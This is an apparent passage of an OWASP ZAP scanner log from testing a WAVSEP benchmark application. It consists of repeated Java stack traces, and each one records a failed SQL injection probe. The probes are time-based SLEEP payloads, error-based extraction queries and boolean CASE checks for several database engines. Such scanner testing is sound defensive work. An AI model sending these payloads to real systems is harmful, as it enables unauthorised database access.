org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679261 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9352=9352) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (9352=9352) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679262 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 6673=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6673=6673) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- jhCX] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 6673=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (6673=6673) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- jhCX at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679263 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4356=4356) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4356=4356) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679263 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 3395 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3395=3395,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT 3395 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(3395=3395,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679264 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [);(SELECT * FROM (SELECT(SLEEP(5)))ShVB)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/);(SELECT * FROM (SELECT(SLEEP(5)))ShVB)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679265 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;(SELECT * FROM (SELECT(SLEEP(5)))FHeC)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/;(SELECT * FROM (SELECT(SLEEP(5)))FHeC)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679265 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(1115=1115,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(1115=1115,1))),0x3a7561713a)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679266 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [');(SELECT * FROM (SELECT(SLEEP(5)))wDRh)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/');(SELECT * FROM (SELECT(SLEEP(5)))wDRh)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679268 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5219=5219) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (5219=5219) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679268 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [';(SELECT * FROM (SELECT(SLEEP(5)))kHQL)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/';(SELECT * FROM (SELECT(SLEEP(5)))kHQL)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679268 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4106=4106) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (4106=4106) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679269 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%';(SELECT * FROM (SELECT(SLEEP(5)))dQAo)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%';(SELECT * FROM (SELECT(SLEEP(5)))dQAo)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679271 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt);(SELECT * FROM (SELECT(SLEEP(5)))eRZK)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt);(SELECT * FROM (SELECT(SLEEP(5)))eRZK)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679271 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;(SELECT * FROM (SELECT(SLEEP(5)))dxSk)#] due to an I/O error 